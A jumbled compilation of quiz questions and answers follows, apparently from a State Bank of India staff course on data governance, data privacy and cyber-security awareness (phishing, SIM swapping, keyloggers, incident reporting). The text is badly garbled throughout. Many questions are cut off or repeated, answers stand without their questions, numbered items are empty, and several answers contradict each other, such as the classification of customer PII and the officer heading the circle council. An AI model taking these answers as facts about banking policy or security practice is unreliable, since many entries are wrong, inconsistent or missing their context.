CONFIDENTIAL

PUBLIC
Both 1 & 2

Both 1 & 2 above

What are the two important pillars of the SOP on ‘Customer Sensitive Granular Data
Sharing and Access – Within Bank’s Environment’:
In case of demand for customer Data by Regulatory Authority, it be shared as per DG

Policy
TRUE

All of the above
Q: Which of the following is true:

A: Data Privacy is about the rules how to protect and use the contents
Q: An SBI Card employee sitting in an branch asks for list of high value customers
along with Mobile numbers for telecalling to sell SBI cards for the Branch. Branch
may share the list with SBI Card employee.
A: FALSE
Q: What is needed to create Data Quality Index?

A: Data quality rule and profiling results.
Q: Capturing of incorrect security in secured loan accounts may result in

A: Both 1 & 2
Q: While verifying the pop-up name of PAN holder in CIF creation screen
A: 1 & 3
Q: As per Data Protection Bill (Draft) PII stands for

A: Personally Identifiable Information I
Q: To boost the housing loan business of the branch , list of HNIs can be shared with
HLCs through:
A: Not to be shared
Q: India is coming with its own Bill on Data Protection which is called ___
A: Personal Data Protection Bill
Q: Project Ganga Dashboard include divergences related to:

A: Both DQ & KRI
Q: Branch has sanctioned a Car loan to one of his staff, but the loan instalment was
not fed in HRMS. The staff paid the instalment through his account and informed the
BM that a SI has been registered for the same.
A: Recovery to staff loan should be through HRMS only, so recovery details in
HRMS needs to be updated
Q: What are the impacts of feeding incorrect date of birth of a customer in CBS
A: 1& 2
Q: DQI Index has been included as one of the Key Responsibility Areas (KRAs) in
Career Development System (CDS)
A: TRUE
Q: Data quality is necessary to fulfil the needs of an organization in terms of

A: All of the above
Q: As per the Bank‟s approved “SOP on Data Sharing with External Agencies/ Third
Parties” which of the following is to be considered as “Third Party”
A: All the above are to be treated as Third Parties
Q: Data Quality Index (DQI) dashboard measures the Data Quality for#
A: CIFs & Loans
Q: Updated policies or SOPs on Data Governance can be accessed through?

A: >>SBI Times>>MIS Online >>SOPs>>DMO
Q: For personal communication, we can use our official email IDs

A: FALSE
Q: Restricted access to Data means:

A: Both 1 & 2
Q: While inputting temporary address of a customer in CBS, it should be taken care

that
A: "From & To" date in the temporary screen needs to be filled in as declared by the
customer
Q: Some of the key Data Privacy initiatives include:

A: All of the above
Q: In the Data Infringement portal, unattended infringements on Data Loss

Prevention (DLP) may result in_____
A: Penal Score (1 to 4 marks) in RFIA of the Branch
Q: A staff can be held accountable for Data quality errors.

A: TRUE
Parties” which of the following is NOT to be considered as “Third Party”
A: Internal Auditors
Q: Customer sensitive Granular Data can be copied and stored without any approval
A: FALSE
Q: What are the two important pillars of the SOP on „Customer Sensitive Granular A:
Data Sharing and Access – Within Bank‟s Environment‟:
A: Regulated & Limited access
Q: What are the different categories of Data Classification

A: SENSITIVE, CONFIDENTIAL, INTERNAL, PUBLIC
Q: “Customer PII Data” is classified as ____________ Data

A: CONFIDENTIAL
Q: Impact of poor Data Quality on a Branch include ____

A: Both 1 & 2 above
Q: Which of the following is not one of the functions of an effective Data Loss
Prevention (DLP) program
A: Follow-up with Data users for Data Quality enhancement
Q: In an Account Opening Form, if Data has been provided by customer in non

mandatory field ( like mobile number /email ID ), what should be done while inputting
in CBS?
A: Input the Data exactly as given by the customer
Q: Sharing of customer sensitive granular Data is governed by which Policy :

A: Data Governance Policy
Q: Scope of Customer Sensitive Granular Data Sharing & Access Framework

covers:
A: All of the above
Q: For official purpose, if we are required to share customer sensitive data, then we
should:
A: Delete the data after use
Q: Which one is NOT an approved way of sharing granular Data/access Data under
normal circumstances:
A: E-mail
Q: Salient features of Project Ganga include:

A: Customer One view
Q: What are the impacts of not verifying the pop-up name of PAN holder, while
fetching PAN details
A: 1& 2
Q: Incorrect spelling of Customer name comes under which one of the following Data
Quality Dimension?
A: Accuracy

A: Both 1 & 2

A: All of the above
A: 1& 2
Q: Can we store customer data on our Desktop ?

A: NO
Q: Objectives of Data Quality are:

i. Accuracy, validity
ii.timeliness, completeness
iii.uniqueness, consistency
A: All of the above
Q: A customer has submitted Voter Card as OVD, along with AOF. During the
scrutiny, it was found that the age of customer is less than 18
A: DOB on OVD and AOF, if same, then only account may be opened
Q: Capturing of incorrect CRA rating / ECR in a loan account may result in _____
A: Both 1 & 2
Q: Error categories in DQI for CIF related errors are:

A: Risk categorization
B. Personal Profile
C. PAN Related
D. Gender Related
E. Age Related
A: All of the Above
Q: Capturing of incorrect interest rate in loan accounts may result in ____________

A: All of the above
Q: Non capturing of PAN in CIF, even if furnished in the AOF, may result in ___
A: Both 1 & 2
Q: If a car dealer asks us for a list of customers having existing car loans, to market
loans for new cars for us, shall we share the list?
A: Cannot be shared

that
customer

A: FALSE
A: 1 & 3
Q: The access to Customer Sensitive Granular Data to the users should be made
strictly on the basis of#
A: Both 1 & 2
Q: Which of the following is not a type of Data leak

A: Improper categorization of sensitive Data
Q: “SBI telephone directory” is classified as ____________ Data

A: INTERNAL
Q: What are the possible means by which Customer Sensitive Granular Data can get
divulged or leaked to any unrelated person / third party like vendors, dealers etc:
A: All of the above
LESSON 3


All are true

Scareware
a.Confidentiality is the concept of the measures used to ensure the protection of the secrecy of data, objects,
or resources.
a, b and d

With the enhanced sharing of information over a global network for almost all life functions , which one of the
following has become the latest addition to the essential objectives of Information Security after the CIA Triad?
Non-repudiation


Which one of the following is the leading illicit dark web marketplace which was taken down by the FBI in what
was considered then as a significant action on the Dark web market?
Silk Road 2.0
The technique for sending SMS that appears to be initiated from the organization for KYC updation, Account credit,
Account suspension, winning lottery, SIM block, eKYC updates etc. is known as________.
Spoofing
Spear Phishing
The hackers through one malicious code in the application of SolarWinds vendor’s application gained access to
Orion software
Your friend fears that he has shared the user credentials of OnlineSBI with a stranger.
It is a Sunday and Bank is closed. What immediate steps would you NOT advise him?
Change the password
Even if a user compromises his/her login credentials of OnlineSBI, no one can login using this credential.
What is the new security feature in OnlineSBI?

Logic Bomb
c.Properly implemented integrity protection provides a means for authorized changes while protecting against
intended and malicious unauthorized activities (such as viruses and intrusions) as well as mistakes made by
authorized users (by commission or omission).
a, c and d
Which of the following browsers allows access to the Network which is popular for implementing encrypted
routing technology and preventing user tracking?
Tor
Social engineering


Ajit is doing a merchant transaction to pay the mobile bill. He selects net banking of SBI for making online payment.
He is redirected to a site of SBI. Before he logs in what should be the website address on the screen.
If you want to change the username and password for your SBI Internet banking,
which of the following statements is correct?

A Cyber-Attack
option a & b
_____________is used for obtaining unauthorized access to mobile phones via Bluetooth connection.
Once such a connection is established then the attacker will be able to steal photos, messages and contacts etc.
Bluesnarfing

It is an attack meant to shut down a machine or network, making it inaccessible to its
intended users


All are true

Scareware
a.Confidentiality is the concept of the measures used to ensure the protection of the
secrecy of data, objects, or resources.
b.The goal of confidentiality protection is to prevent unauthorized access to the
information.
c.Confidentiality focuses security measures on ensuring that none other than the sender of
a message is able to read it.
a, b and d

With the enhanced sharing of information over a global network for almost all life
functions , which one of the following has become the latest addition to the essential
objectives of Information Security after the CIA Triad?
Non-repudiation


Which one of the following is the leading illicit dark web marketplace which was taken
down by the FBI in what was considered then as a significant action on the Dark web
market?
Silk Road 2.0
The technique for sending SMS that appears to be initiated from the organization for KYC
updation, Account credit, Account suspension, winning lottery, SIM block, eKYC updates
etc. is known as________.
Spoofing
____________.
Spear Phishing
Vendor attacks

The hackers through one malicious code in the application of SolarWinds vendor’s
Your friend fears that he has shared the user credentials of OnlineSBI with a stranger. It is
a Sunday and Bank is closed. What immediate steps would you NOT advise him?
Change the password
Even if a user compromises his/her login credentials of OnlineSBI, no one can login using
this credential. What is the new security feature in OnlineSBI?

Logic Bomb
a.Integrity is the concept of protecting the accuracy and completeness of information and
processing methods.
c.Properly implemented integrity protection provides a means for authorized changes while
protecting against intended and malicious unauthorized activities (such as viruses and
intrusions) as well as mistakes made by authorized users (by commission or
omission).
a, c and d
Tor
Social engineering


making online payment. He is redirected to a site of SBI. Before he logs in what should be
If you want to change the username and password for your SBI Internet banking, which of
the following statements is correct?

A Cyber-Attack
option a & b
connection. Once such a connection is established then the attacker will be able to steal
Bluesnarfing

SBI internet banking site provides a facility to bypass such keylogger malware. Identify the
feature.
Q: Which one of the following risks is not considered while evaluating a third party
vendor for risk assessment?
A: Market Risk
Q: _____________is used for obtaining unauthorized access to mobile phones via

Bluetooth connection. Once such a connection is established then the attacker will be
able to steal photos, messages and contacts etc.
A: Bluesnarfing
Q: Which one of the following statements is false?

A: Bulk SMS is sending SMS from mobile to many people.
Q: Non-repudiation is carried out through the services of authentication, authorization,

A: Secure encryption of the information
Q: Which one of the following best describes a Man in the Middle (MITM) attack?
A: An attack used to monitor and potentially modify communications between two users
Q: Which of the following principles of the first of the CIA Triad Confidentiality is/are
Correct?
A: a, c and d
Q: Which of the following attacks is not categorised under Exploit based attacks?
A: Email hijacking
Q: Which of the following is not a stage in SIM swapping?

A: All the options above are stages of SIM Swapping
Q: What is the full form of MITB Attack?
A: Man in the Browser
Q: If you click on the padlock sign in the Address bar. Which of the following information
will be available to you?
A: You will get information on who owns the site and who has verified the site
Q: What is a “Collect Request” in a UPI transaction?

A: It is a feature available in BHIM SBI Pay
Q: Which one of the following is NOT a type of MITM attack?

A: DNS Spoofing
Q: Which one of the following statements is more appropriate in terms of Vendor risk
assessment?
A: Continuous assessment of Vendor security practices need to be done throughout the
Q: The Cyber-attacks originate through a third party vendor are also called ________?
A: Supply chain attacks
Q: How does the use of Virtual keyboard protect the customer?

A: It protects against Keylogger malware
Q: Which one of the following statements is FALSE about APT attacks?

A: APT attacks may be identified immediately as it shuts down the whole system
Q: _______ malware is a warning-like popup or reminder in a Laptop/PC/Mobile?

A: Scareware
Q: Which of the following may not be the signs that the Mobile Phone (Android/iOS) is
hacked?
A: All statements are signs that the Mobile phone is hacked
Q: What makes SolarWinds attack an unusual hack?

A: The hackers through one malicious code in SolarWinds Orion software gained
access to thousands of other companies.
Q: Even if a user compromises his/her login credentials of OnlineSBI, no one can login
using this credential. What is the new security feature in OnlineSBI?
A: OTP has been made mandatory at the time of login
Q: Which of the following options is not to protect yourself from keyloggers?

A: Antivirus companies keep their records of the most common malware keyloggers and
will flag them as dangerous.
Q: Social Engineering Attacks does not include _____________

A: Denial of Service attack
Q: What is not true about myths associated with Cyber Risk?
A: Compliance and security are the same
Q: Which of the following best describes the Supply chain attack?

A: Supply chain attack occurs when hackers infiltrates systems through an outside
partner or provider who has access to the target systems and data
Q: What is Denial of Service Attacks?
A: It is a malicious attempt to disrupt the normal traffic of a targeted server, service or
Q: While doing an ATM transaction, a customer is required to use a physical card

provided to him by the Bank and also a PIN code to authenticate the transaction. This
practice ensures which of the following triad of Information Security?
A: Confidentiality
Q: Which of the following principles of the second of CIA Triad Integrity is/are Correct?
A: Use of a secure Hashing algorithm for the information ensures Integrity.

A: It is an attack meant to shut down a machine or network, making it inaccessible to its
intended users
Q: Which one of the following is a precautions to be taken while operating the ATM?
A: Check if any extra suspicious device is attached to the ATM machine.

Q: Select the correct statement about the impact of Cyber Risks.

A: All are true
Q: __________ malware is a warning-like popup or reminder in a Laptop/PC/Mobile?

A: Scareware
Correct?
A: a, b and d
Q: What is not true about SIM Swapping?

A: Fraudsters get access to the root of the mobile phone through SIM Swapping
Q: With the enhanced sharing of information over a global network for almost all life
functions , which one of the following
A: Non-repudiation

A: IT team is alone not responsible for Cyber Security

Q: The technique for sending SMS that appears to be initiated from the organization for
KYC updation, Account credit, Account
A: Spoofing
Q: The technique used to send the emails to all the employees of the Bank is known as
____________.
A: Spear Phishing
A: The hackers through one malicious code in the application of SolarWinds vendor’s
Q: Your friend fears that he has shared the user credentials of OnlineSBI with a stranger. It
is a Sunday and Bank is closed.
A: Change the password
using this credential. What is the

A: Logic Bomb
A: a, c and d
Q: Which of the following browsers allows access to the Network which is popular for
implementing encrypted routing
A: Tor
Q: The fraudster gets the personal details of the people through _______technique.
A: Social engineering
Q: Which of the following is not the examples of data?

A: All are examples of data
Q: Which one is not an option for disabling UPI services?

A:YONO Main Screen UPI Enable/Disable UPI
Q: Ajit is doing a merchant transaction to pay the mobile bill. He selects net banking of SBI
for making online payment. He
A: It should start with https://www.onlinesbi.com
Q: If you want to change the username and password for your SBI Internet banking, which
of the following statements is
A: You cannot change the Username but he/she can change the password at any time


Bluetooth connection. Once such a connection
A: Bluesnarfing

Q: SBI internet banking site provides a facility to bypass such keylogger malware. Identify
the feature.
A: Online Virtual Keyboard
LESSON 4
1
Which one of the following is the most important aspect for an organization as big and global as SBI to
protect itself from cyber security attacks and subsequent loss of brand image?
A training awareness program that would provide education and guidance on a range of information security topics
to all the internal users of its systems and applications.
2
3
4
5
6
Dictionary Attack
7
8
All of the above
9
If a Bank always allow some of the employees to bring their own laptops, smart phones, tablets etc. to office for office
10
11
Pick the odd one.
12
All are true
13
14
15
The company asked their employees to use their own devices and internet access while working from home.
List some precautions that they could have exercised even under these conditions: (i) Ensuring that authorized
antivirus is installed in the devices of the employees (ii) Ensuring that appropriate software patches are updated
in the devices of the employees (iii) Asking the employees to use enterprise VPN
16
17
All of the above
18
Which of the following statements is correct regarding creation of Profile password using the Multilingual Image
based Virtual keyboard?
The Profile password should be a combination of alphabets (in the language chosen), and numerals and special
characters
19
Which one of the following applications is not a threat to compromise confidentiality of the data of portable devices?
Air watch agent
20
21
22
23
24
25
What is the timelines for reporting of cyber incidents to RBI and other Statutory Authorities CERT-In & NCIIPC?
Who should report the incident?
26
27
28
29
30
image?
A training awareness program that would provide education and guidance on a range of
information security topics to all the internal users of its systems and applications.
2
3
Which one of the following options does not substantiate the Acceptable Usage Policy of
our Bank?
However, Mobile and laptop given to the staff for personal holding have exceptions to the
policy.
4
5
6
Websites use CAPTCHA to avoid password guessing by automated tools to prevent from
_______.
Dictionary Attack
7
In case of any breach in a Social Media Handle, delete your Social Media Account instead
of changing the password.
8
All of the above
9
tablets etc. to office for office work. This policy is called BYOD. What does BYOD stand
for?
10
Can we create the password in other regional language (Other than English and Hindi) in
Retail Internet Banking?
11
Pick the odd one.
Passwords should not be treated like signatures
12
All are true
13
Which of the following statements is not true about Acceptable usage policy (IS Policy) of
our Bank?
14
15
these conditions: (i) Ensuring that authorized antivirus is installed in the devices of the
employees (ii) Ensuring that appropriate software patches are updated in the
16
17
Which one of the following options is not considered as incident for reporting to RBI,
NCIIPC and CERT-In?
All of the above
18
19
Which one of the following applications is not a threat to compromise confidentiality of the
Air watch agent
20
What are the ways you can report an unauthorised transaction (ATM) without visiting the
branch?
21
22

24
25
All cyber security incidents should be reported within 2 to 6 hours by Incident Response &
Management Team
26
27
28
29
What should be the minimum and maximum length of the login password in Retail Internet
Banking?
30
For web security, verify full URL by clicking the link, but do not give any
Q: Method that is NOT suggested to prevent new account fraud.

A: Contact the bank immediately and ensure all the operating accounts are closed
Q: Can we create the password in other regional language (Other than English and
Hindi) in Retail Internet Banking?
A: You can use the multilingual image based virtual keyboard in Hindi or English
only.
Q: Which one of the following options is not a violation of acceptable usage policy?
A: Receiving mails from his batchmate
Q: Impact of Cyber risks are_________________

A: All of the above
Q: What is the “Time of detection of incident” for reporting the purpose of a cyber
incident to RBI, CERT-In & NCIIPC?
A: Time at which, the incident is brought to the knowledge of any official of AO,
including DGM & Module CISO
Q: Which of the following options is NOT a good wi-fi security practice?

A: You can use unsecure or open Wi-Fi for official purposes in case of emergency
Q: Pick the odd one.

A: Passwords should not be treated like signatures.
Q: Select the wrong statement.

A: It is not necessary to inform your organization always, if you come across any
discrepancies.
Q: As part of IS awareness and commemoration of Computer Security Day, SBI did

NOT organize which one of the following activities?
A: Cold calling all the employees
Q: “Ransomware” can be spread through_____________?

A: Option 1 and 2 Item 11
Q: Who can report cyber incidents to Information Security Department (ISD)?

A: Anyone who knows about cyber incidents including general public
Q: Which of the following statements is correct regarding creation of Profile
password using the Multilingual Image based Virtual keyboard?
A: The Profile password should be a combination of alphabets (in the language
chosen), and numerals and special characters
Q: Which of the following is NOT one of the best practices to maintain your
password?
A: Only difficult dictionary words should be used
Q: Customer reported an unauthorised UPI transaction of Rs.72,000/- in his account.

He reported the incident on the same day to the bank. The bank is not able to
establish customer negligence even after completion of 90 days from the date of
complaint. As per Limiting Liability of customer guidelines, how much amount does
the Bank needs to pay to the customer in this situation?
A: Rs.72,000/-
Q: Select the wrong statement about the Acceptable usage policy (IS Policy) of our
Bank?
A: Successful backup of critical applications or data should be ensured yearly and to
be kept offsite.
Q: The time at which the cyber incident is brought to the knowledge of any official of
__________ shall be treated as time of detection of incident.
A: Information Security Dept. CC Mumbai
Q: Select the wrong statement about Desktop / Laptops /Workstations Usage?

A: Create a shortcut of a document/file instead of copying it on the desktop
Q: Cyber security incidents can be reported

A: by any employee or public
Q: Which of the following options is crucial in any UPI fraud related to Collect
request?
A: option a & b
Q: Which of the following options is NOT the best password security practices?
A: Change your password, only if you suspect it may have been exposed
Q: Which one of the following is the most important aspect for an organization as big
and global as SBI to protect itself from cyber security attacks and subsequent loss of
brand image?
A: A training awareness program that would provide education and guidance on a
range of information security topics to all the internal users of its systems and
applications.
Q: Which one of the following options does not substantiate the Acceptable Usage Policy
of our Bank?
A: However, Mobile and laptop given to the staff for personal holding have exceptions to
the policy.
Q: Identify some of the risks involved in using public free WiFi.

A: All of the above statements are correct
Q: Websites use CAPTCHA to avoid password guessing by automated tools to prevent
from _______.
A: Dictionary Attack
Q: Which one of the following options is not a concern for password security?
A: In case of any breach in a Social Media Handle, delete your Social Media Account
instead of changing the password.
Q: Which of the following incident(s) should be reported to RBI, CERT-In & NCIIPC?
A: All of the above
Q: If a Bank always allow some of the employees to bring their own laptops, smart phones,
tablets etc. to office for office use
A: Bring Your Own Device
Q: Can we create the password in other regional language (Other than English and Hindi)
in Retail Internet Banking?
A: You can use the multilingual image based virtual keyboard in Hindi or English only.

Q: Select the wrong statement about the Acceptable usage policy (IS Policy) of our Bank?
A: All are true
Q: Which of the following statements is not true about Acceptable usage policy (IS Policy)
of our Bank?
A: Employee’s mobile devices need not have Antivirus software
Q: What action will you take, when you are defrauded?

A: Lock the user access immediately
Q: The company asked their employees to use their own devices and internet access
while working from home. List some devices of the employees (iii) Asking the employees
to use enterprise VPN
A: Options (i) , (ii) and (iii) are necessary
Q: Which one of the following options is not considered as incident for reporting to RBI,
NCIIPC and CERT-In?
A: All of the above
Q: Which of the following statements is correct regarding creation of Profile password

using the Multilingual Image based
A: The Profile password should be a combination of alphabets (in the language chosen),
and numerals and special characters
Q: Which one of the following applications is not a threat to compromise confidentiality of

the data of portable devices?
A: Air watch agent
Q: What are the ways you can report an unauthorised transaction (ATM) without visiting
the branch?
A: Call dedicated number 1800 1111 09 also Can raise through https://crcf.sbi.co.in
Q: Which of the following steps would not be a part of the planning for Work from home?
A: Ensuring the physical access to the systems room is restricted and monitored
Q: Which one of the following options is NOT a violation of acceptable usage policy?
A: There was a data vulnerability due to lack of Anti-virus
Q: What is the timelines for reporting of cyber incidents to RBI and other Statutory
Authorities CERT-In & NCIIPC? Who
A: All cyber security incidents should be reported within 2 to 6 hours by Incident Response
& Management Team
Q: Which of the following options is an example of inappropriate use of the e-mail service?
A: Use of other officers' user ids or using a false identity.


A: For web security, verify full URL by clicking the link, but do not give any
Course Name: Data Governance & Cyber Security
Topic Name: Module 1
(Marks obtained 26/30)
1. Who can be called Data Stakeholders: All of the above
2. Data Governance Organisation involves a multi-tiered combination of
business and technology roles which include(s): All of the above
3. ________________is ultimately accountable with regard to the
definition, Data quality and value of Data in a given subject area.: None of
the above
4. Data governance processes primarily must focus on __________: Business
Needs
5. What is the frequency of the meeting for Apex level Data Governance
Council (ADGC)?: Quarterly
6. Data Governance includes: All of the above
7. Administrative office Data Governance Council (A-DGC), is headed by:
DGM B & O
8. What are the main sources for low Data Quality? All of the above
9. Data Governance Council-Business Unit/Vertical is being headed by: All of
the above
10.(i) Data Governance is about the rules how to build the content. (ii) Data
Privacy is about the rules how to protect and use the content.: Both are
correct
11.At the time of account opening, it was found that Educational
Qualification was not mentioned by the customer in AOF, but it is a
mandatory filed in CBS: Teller should contact the customer and then fill in
CBS
12.As per the Data Governance Policy, who is Data Owner?: Branch Manager
13.Analytics refers to the process of using Data in order to: All of the above
14.Data is always originated within the organization: False
15.Which of the following is/are a Key Data Quality Dimension?: All of the
above
16.Providing training to staff is one of the responsibilities of Data Privacy
Officer: True
17.Where does Data come from? People process and Technology
18.Apex level Data Governance Council (ADGC), is headed by: Chairman
19.Data Management with lack of easy access to information for important
stakeholders may result in just _________: Big Data Strategy
20.Poor Data Quality may result in ______: Incorrect Regulatory Reporting
1|Page
21.Data processes must Include ____________: All of the above
22.Which among the following may be held accountable for quality of data?
People
23.____ is DGO of Circle: DGM and CFO
24.Data Management Office (DMO) is headed by: GM and CDMO
25.Data Governance Policy is applicable to all the domestic offices of SBI
including: All of the above
26.Who would be held responsible for not feeding all the customer details in
CBS, given by customer in AOF.Both Maker and Checker
27.________shall ensure that there is commensurate adherence,
management and periodic upkeep/review for Data in their respective
custodies, as prescribed by Data Governance Policy: Data Custodians
28.Data Governance Council (DGC) is presently being headed by: DMD and
CIO
29.Prime objective of Data governance framework is to ensure- All of the
above
30.Data processes must Include ____________: All of the above
31.DBAs are NOT part of Data Stakeholders: FALSE
32.What is the frequency of the meeting for Data Governance Council-
Business Unit/ Vertical (DGC-BU/V)?: Quarterly
33.Technology Solutions which help in data Governance initiatives include
______: All of the Above
34.Process for submission and handling of the Data request is mentioned in:
Both
35._________________is ultimately accountable with regard to the
definition, Data quality and value of Data in a given subject area: Data
Custodian
36.Data processes must Include ____________: All of the Above
37.Who among the following has a role to ensure that data governance
initiatives are aligned with business needs: Data Team
38.Inconsistent Data in Annual Income fields vis a vis customer profile may
primarily result in ________: Incorrect AML/CFT compliance
39.Where does Data come from? People, Process and Technology
40.Data Governance Policy is applicable to third parties having access to SBI
network and Data.: TRUE
41.What is/are the responsibility(ies) of the Data Governance Council (DGC):
All of the above
2|Page
42.Against availability of sizeable number of eligible customers only few
confirmed leads could be generated for an Analytics based product. What
could be the underlying reason? Poor Data Quality
43.Data Governance process includes activities as: Audit, Monitor & Control
of Data Governance activities: All of the above
44.Data Governance Policy is applicable to: All employees of the Bank
45.Prime objective of Data governance framework is to ensure- All of the
above
46.Data Management Office reports to which of the DMDs: DMD & Chief
Information Officer
47.Data Governance can NOT be achieved by Technology alone: TRUE
48.As per the Bank's Data Governance structure, presently which is the Apex
body for Data Governance?: Apex level Data Governance Council (ADGC)
49.Which of the following is/are a Key Data Quality Dimension? All of the
above
50.The primary priority of Data Processes must be _____ Business Needs
51.________shall ensure that there is commensurate adherence,
management and periodic upkeep/review for Data in their respective
custodies, as prescribed by Data Governance Policy: Data custodians
52.Which among the following play major role in support of company-wide
Data quality initiatives? Regulators
53.Data Governance Policy is formulated by which Department: Data
Management Office
54.Data-driven business decisions are possible when _____ is involved in the
Data Governance.: Business Unit
55.____ is DGO of Circle: DGM & CRO
56.Data governance processes primarily must focus on __________: Business
Needs
57.Data processes must Include ____________: Definitions of how data will
be moved and changed
58.Data processes must also put in place ______: All of the Above
59.The word “Data” shall collectively refer to the following descriptions: All
of the above
60.Analytics refers to the process of using Data in order to: All of the above
3|Page
Module 2:
Data Quality and Data Divergence (Score 29/30)
1. India is coming with its own Bill on Data Protection which is called ___:
Personal Data Protection Bill
2. In case of demand for customer Data by Regulatory Authority, it be shared
as per DG Policy: True
3. Sharing of customer sensitive granular Data is governed by which Policy :
Data Governance Policy
4. A staff can be held accountable for Data quality errors.: True
5. Capturing of incorrect security in secured loan accounts may result in
_____________.: Both 1 and 2
6. While inputting temporary address of a customer in CBS, it should be
taken care that: Form & To date in the temp screen needs to be filled as
declared by the customer.
7. In an Account Opening Form, if Data has been provided by customer in
non mandatory field ( like mobile number /email ID ), what should be
done while inputting in CBS?: input the data exactly as entered by the
customer
8. Which of the following is not a type of Data leak: Submission of P report
in Hard copy to controller.
9. Business Leads from Analytics comes under Customer Sensitive Granular
Data: True
10.What are the impacts of not verifying the pop-up name of PAN holder,
while fetching PAN details: Both 1 & 2
11.If a car dealer asks us for a list of customers having existing car loans, to
market loans for new cars for us, shall we share the list?: Cannot be shared
12.Salient features of Project Ganga include: All of the above
13.Which of the following is not one of the functions of an effective Data Loss
Prevention (DLP) program: Follow up with data users
14.What is/are the possible consequences of Data Leakage: All of the above
15.Project Ganga Dashboard include divergences related to:: Both DQ and
KRI
16.Which of the following documents should be referred for operational
details while handling requests for sharing Customer Sensitive Granular
Data within Bank’s environment: SOP on Customer
17.A customer has submitted Voter Card as OVD, along with AOF. During the
scrutiny, it was found that the age of customer is less than 18: DOB on
OVD and AOF
18.Objectives of Data Quality are:
4|Page
None of the above
19.Main Pillars of Data Quality Management are
A) Data Profiling
B) Defining Data Quality
C) Data Reporting
D) Data Repair
A, B,C,D
20.DQI dashboard displays errors: All of the above
21.As per Data Protection Bill (Draft) PII stands for: Personally, identifiable
Information
22.“Internal audit reports” is classified as ____________ Data: Confidential
23.A customer has submitted Driving License as OVD, along with AOF. During
the scrutiny, it was found that the age of customer is less than 18: DOB
and AOF to be checked… to be accepted.
24.Government provided IDs (PAN, License, Passport, etc.), Customer age,
Customer's gender, Customer phone number, Customer address,
Customer occupation are classified as: Sensitive
25.Which of the following are examples of Sensitive Information:: All of the
above
26.“Training materials and manuals” are classified as ____________ Data:
Internal
27.While verifying the pop-up name of PAN holder in CIF creation screen: 1
&3
28.Capturing of incorrect interest rate in loan accounts may result in
_____________.: All of the above
29.Non-sensitive Information includes: Both 1 and 2
30.An SBI Card employee sitting in an branch asks for list of high value
customers along with Mobile numbers for telecalling to sell SBI cards for
the Branch. Branch may share the list with SBI Card employee.: False
31.Which of the following is not one of the functions of an effective Data Loss
Follow-up with Data users for Data Quality enhancement
32.As per Data Protection Bill (Draft) PII stands for: Personally Identifiable
Information
33.Branch has sanctioned a Car loan to one of his staff, but the loan
instalment was not fed in HRMS. The staff paid the instalment through his
account and informed the BM that a SI has been registered for the same:
5|Page
Recovery to staff loan should be through HRMS only, so recovery details
in HRMS needs to be updated
34.Customer Sensitive Granular Data made available through SSO to ensure
an audit trail comes under which one of the following? Need to Access
35.In ________________ Processing, small group of transactions are
processed on demand: Batch
36.Updated policies or SOPs on Data Governance can be accessed through?
>>SBI Times>>MIS Online >>SOPs>>Data Analytics
37.“Card Holder Details, CIF, Account Information (credentials, balance,
transactions, premiums, dividends, etc.)” are classified as: SENSITIVE
38.Salient features of Project Ganga include: All of the above
39.Impact of poor Data Quality on a Branch include ____: Both 1 & 2 above
40.Data quality is necessary to fulfil the needs of an organization in terms of
: All of the above
41.While inputting temporary address of a customer in CBS, it should be
taken care that:
"From & To" date in the temporary screen needs to be filled in as declared
by the customer
42.If, there is slight mis-match in Customer name in OVD and AOF, customer
name as in AOF has to be fed in CBS, as it is declared by the customer:
Customer needs to be advised for rectification of name in OVD, and then
open account
43.A customer has submitted Driving License as OVD, along with AOF. During
the scrutiny, it was found that the age of customer is less than 18: DOB on
OVD and AOF to be checked, even then he is less than 18 yrs, OVD not to
be accepted
44.A staff can be held accountable for Data quality errors. : TRUE
45.What does GDPR stand for- General Data Protection Regulation
46.Responsibilities of the Customer Sensitive Granular Data User include the
following, except
:Customer Sensitive Granular Data can be copied, stored, processed or
altered by the user and no specific approval required.
47.Customer sensitive Granular Data can be copied and stored without any
approval: FALSE
48.Some of the key Data Privacy initiatives include: All of the above
49.As per the Bank’s approved “SOP on Data Sharing with External Agencies/
Third Parties” which of the following is NOT to be considered as “Third
Party”: Internal Auditors
50.“Customer PII Data” is classified as ____________ Data: SENSITIVE
6|Page
51.Which of the following is not a type of Data leak: Submission of monthly
P-report to controller in hard copy
52.What are the different categories of Data Classification: SENSITIVE,

CONFIDENTIAL, INTERNAL, PUBLIC
53.What are the possible means by which Customer Sensitive Granular Data
can get divulged or leaked to any unrelated person / third party like
vendors, dealers etc:: All of the above
54.Capturing of incorrect security in secured loan accounts may result in
_____________: Both 1 & 2
55.Which Portal to be accessed for Data Loss Prevention (DLP) incidents:
56.A customer has submitted Voter Card as OVD, along with AOF. During the
scrutiny, it was found that the age of customer is less than 18: DOB on
OVD and AOF, if same, then only account may be opened
57.Which of the following is true: All of the above
58.DQI Index has been included as one of the Key Responsibility Areas (KRAs)
in Career Development System (CDS): TRUE
59.“SOP on Data Sharing with External agencies/ Third Parties” rests on four
pillars, which one of the following is NOT one of these four pillars: Bank is
free to use/process/share customers’ Data in whatever way it may desire
60.Scope of Customer Sensitive Granular Data Sharing & Access Framework
covers: All of the above
7|Page
Module 3 (23/30)
1. What is a keylogger?
a) Itis a facility that saves the users password so that he need not enter it
every time.
b) Itis a software that facilitates the user to discontinue the use of the
mouse.
c) tis a facility to the user so that he need not type the same keys every time.
d) tis a surveillance software that records every keystroke made in the
system, creates a file and sends it to a specified server
2. Which one of the following statements is more appropriate in terms of
Vendor risk assessment?
a) Vendor risk assessment is not required when the sourced service does not
directly impact company's core operations
b) Vendor security practices need to be assessed before awarding the
contract
a. Vendor software coding practices need not be assessed
c) Continuous assessment of Vendor security practices need to be done
throughout the Contract life cycle.
3 The Cyber-attacks originate through a third party vendor are also called
a) Vendor attacks
b) Supply chain attacks
c) Supplier attacks
d) Service provider attacks
4. How does the use of Virtual keyboard protect the customer?
a) It protects against computer Worms.
b) lt protects against computer Viruses
c) lt is a useless feature
d) It protects against Keylogger malware
5 What is not true about SIM Swapping?
a) SIM Swapping is a fraud that occurs when the fraudsters manage to get a
new SIM card issued for a specific registered mobile numbe-
b) Phishing or social engineering techniques are used to obtain personal
information of the customers/users.
8|Page
c) Fraudsters get access to the root of the mobile phone through SIM
Swapping
d) Option b & c
6 The fraudster gets the personal details of the people through
a) Social engineering8
b) Spoofing
c) Keylo Eger malware
d) Vishing
7. Which one of the following is a precautions to be taken while operating the

ATM?
a) Check if any extra suspicious device is attached to the ATM machine.
b) Allow another person to watch while entering PIN
c) Taking help from unknown persons if there is a problem with the ATM
